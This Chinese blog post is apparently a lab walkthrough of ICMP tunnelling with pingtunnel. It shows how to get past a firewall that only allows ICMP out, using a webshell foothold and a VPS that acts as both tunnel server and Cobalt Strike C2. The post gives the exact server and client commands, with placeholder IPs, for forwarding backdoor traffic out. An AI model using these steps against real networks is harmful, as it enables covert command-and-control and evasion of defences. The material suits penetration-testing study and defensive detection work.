内网-ICMP隧道(pingtunnel)

随笔3个月前发布 天海直純
34 0 0

内网-ICMP隧道(pingtunnel)

 

 

常用的隧道技术:

利用各种隧道技术,以网络防火墙允许的协议,

绕过网络防火墙的封锁,实现访问被封锁的目标网络

网络层:IPv6 隧道、ICMP 隧道

传输层:TCP 隧道、UDP 隧道、常规端口转发

应用层:SSH 隧道、HTTP/S 隧道、DNS 隧道

 

协议 判断命令

ICMP ping ip or domain

HTTP   curl ip or domain

SSH    ssh  ip or domain

DNS     nslookup domain

TCP     telnet ip port

… …………….

环境准备

本机作为攻击机,一台vps作为C2服务器,以及隧道服务端。

靶机使用一台云服务器,开启防火墙。

内网-ICMP隧道(pingtunnel)

 出站入站规则全部禁止,入站规则中添加web,允许访问80端口。

内网-ICMP隧道(pingtunnel)

 出站规则中允许ICMP

内网-ICMP隧道(pingtunnel)

 使用webshell连接web服务器。首先直接上传CS后门执行发现无法上线,之后信息收集,得到出网协议为ICMP。

内网-ICMP隧道(pingtunnel)

 

隧道搭建

相关项目
https://github.com/esrrhs/pingtunnel

首先将工具上传至VPS启动服务端

./pingtunnel -type server

之后将工具通过webshell上传,在客户端启动

pingtunnel -type client -l :3333 -s x.x.x.x -t x.x.x.x:4444 -tcp 1 -noprint 1 -nolog 1

这条命令中,-l后的端口为本机端口,-s后为服务端IP,-t后为服务端地址以及端口。

之后连接成功后,服务端会有结果返回。

内网-ICMP隧道(pingtunnel)

 在CS中需要新建两个监听器,一个监听器监听本机的地址端口,需要使用这个监听器生成后门,之后上传运行。

内网-ICMP隧道(pingtunnel)

 因为流量为HTTP,经过隧道转发后到了VPS上服务端的相关端口上,所以监听对应的端口。

内网-ICMP隧道(pingtunnel)

 之后执行发现可以上线。

内网-ICMP隧道(pingtunnel)

 

© 版权声明

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...